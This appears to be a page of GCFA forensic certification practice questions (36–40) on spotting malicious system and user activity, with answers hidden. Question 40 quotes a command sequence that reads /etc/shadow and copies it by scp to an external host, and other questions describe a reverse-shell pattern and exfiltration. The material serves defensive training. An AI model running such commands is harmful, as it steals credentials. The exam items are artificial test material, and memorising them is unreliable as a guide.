
GIAC Certified Forensic Analyst
Domain 5Objective 2
Identification of Malicious System and User Activity GCFA Practice Questions (Page 8)
Part of the Activity Analysis domain, which makes up ~18% of our current practice bank. GIAC (SANS) does not publish an official question count, but from its 180-minute exam (~70–120 total, ~13–22 in this domain), expect 7–11 from this objective — we provide 40 practice questions to prepare you well beyond it. (estimate)
40questions here
8free pages
3concepts
Questions 36–40
- 36
A forensic analyst is reviewing file access logs and notices that a user account, which normally accesses only marketing documents, suddenly accessed a large number of files in the HR directory and then copied them to a USB drive. Which malicious user activity does this behavior most directly indicate?
Select an answer first - 37
A forensic analyst is monitoring a production server. They notice that a process named 'svchost.exe' is making repeated connections to an IP address known to be a command-and-control server. The process's command line includes '-k netsvcs' which is normal, but the binary path is C:\Windows\Temp\svchost.exe. What should the analyst do?
Select an answer first - 38
A forensic analyst is reviewing a Linux server's audit logs. They notice a series of syscalls from a process named 'httpd' that include 'connect()' to a non-standard port on an internal IP, followed by 'execve()' of '/bin/sh'. The process's parent is PID 1 (init). The web server's normal behavior does not include outbound connections. What should the analyst conclude?
Select an answer first - 39
A user's account shows multiple failed logon attempts, followed by a successful logon at 3:00 AM, and then a large file transfer to an external FTP server. Which pattern of malicious user activity does this represent?
Select an answer first - 40
An analyst is reviewing a user's command history. The user 'asmith' ran the following commands in sequence: 'sudo su -', 'cat /etc/shadow', 'scp /etc/shadow user@external-ip:/tmp/'. The user is a junior administrator with no need to access the shadow file. What does this indicate?
Select an answer first
Finished these 5 questions?
Review the revealed explanations, or continue through the curriculum.
No more pagesBack to GCFA
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by GIAC (SANS). “GCFA” is a trademark of its owner, used for identification only.